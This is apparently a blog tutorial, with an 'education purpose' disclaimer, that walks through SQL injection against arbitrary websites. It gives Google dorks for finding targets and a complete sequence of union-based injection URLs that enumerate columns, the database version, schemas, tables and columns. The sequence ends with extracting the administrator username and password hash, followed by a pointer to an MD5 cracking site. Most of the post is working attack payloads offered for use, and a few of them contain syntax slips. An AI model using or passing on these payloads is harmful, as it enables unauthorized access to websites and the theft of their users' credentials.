#------------------------------------WEBSITE HACKING ------------------------------------#
#-------------------------------------SQL INJECTION----------------------------------------#
#----------------------------------------NOTICE----------------------------------------------#
1. This post is only for education purpose
2. i'm trying to inform you all how to hacker do all these type of things.
3. please don't use this artical for illegal purpose .
4. if anyone get any truble i'm not responsible for anything.
#-------------------------------------INTRODUCTION----------------------------------------#
SQL stand for structural query language.
SQL injection is method to hack a website by inject the sql script in it.
SQL is used for communicate with database of the website.
1.-------------------finding the SQL injection vulnerable website --------------------------
GOOGLE dork is best
inurl:index.php?id=
inurl:admin.php?id=
inurl:pages.php?id=
inurl:pages.php?id=
copy and paste one script on Google like inurl:index.php?id=
2--------------------------------- open any website ------------------------------------------
like ==> www.target.com/index.php?id=1
3. ----------Now you have to add a (') at the last of the URL------------------------------
like==> www.target.com/index.php?id=1'
if you get an error like ###you have an error on MYSQL###
the website is vulnerable to sql injection.
4.--------------- ---------Now we have to find number of column--------------------------
www.target.com/index.php?id=1 order by 10-- ( ERROR)
www.target.com/index.php?id=1 order by 9-- (ERROR)
www.target.com/index.php?id=1 order by 8-- (ERROR)
www.target.com/index.php?id=1 order by 7-- (NO ERROR)
the column number 7 does't show any show so we can easily say the number of column is 7
5.----------------------Now we have to find vulnerable column-----------------------------
www.target.com/index.php?id=1 union select 1,2,3,4,5,6,7--
if it show the number 2 then vulnerable column is 2
6. ----------- ----------------we have to find version of database---------------------------
www.target.com/index.php?id=1 union select 1,@@version,3,4,5,6,7--
Replacing the vulnerable column with "@@version"
if it show version 5.1 log then for can move on to next step
7.------------------------ Now find the name of database------------------------------------
www.target.com/index.php?id=1 union select 1group_concat(schema_name),3,4,5,6,7 from information_schema.schemata--
it will show the name of the data base let name of data base is "world"
8. ------------------------------Now find name of all table ----------------------------------
www.target.com/index.php?id=1 union select 1,concat(table_name),3,4,5,6,7 from information_schema.tables where table_schema=database()--
it will show lot of table name we have to find only admin or user type of table name
let we find table name "administrator"
9.----------------------Now we have to find the column name------------------------------
www.target.com/index.php?id=1 union select 1,concat(column_name),3,4,5,6,7 from information_schema.columns where table_schema=database()--
we all see lot of no of column name we only have to find user_name and password
let we have two column name user_name and pass_word.
10. --------------------Now find the password of user_name-------------------------------
www.target.com/index.php?id=1 union select 1,concat(user_name,0x3a,pass_word),3,4,5,6,7 from world.administrator
it will show the username and the password
it will show the encrypted password we must have to decrypt
to decryted the password i recommended used www.md5decypter.co.uk
11. -----------------------------------NOTICE--------------------------------------------------
1. this post is only for education purpose
2. i'm try to information how to hacker to all these type of hacking.
3. please don't use this artical for illegal purpose .
4. if anyone get any truble i'm not responsible for anything.
0 comments:
Post a Comment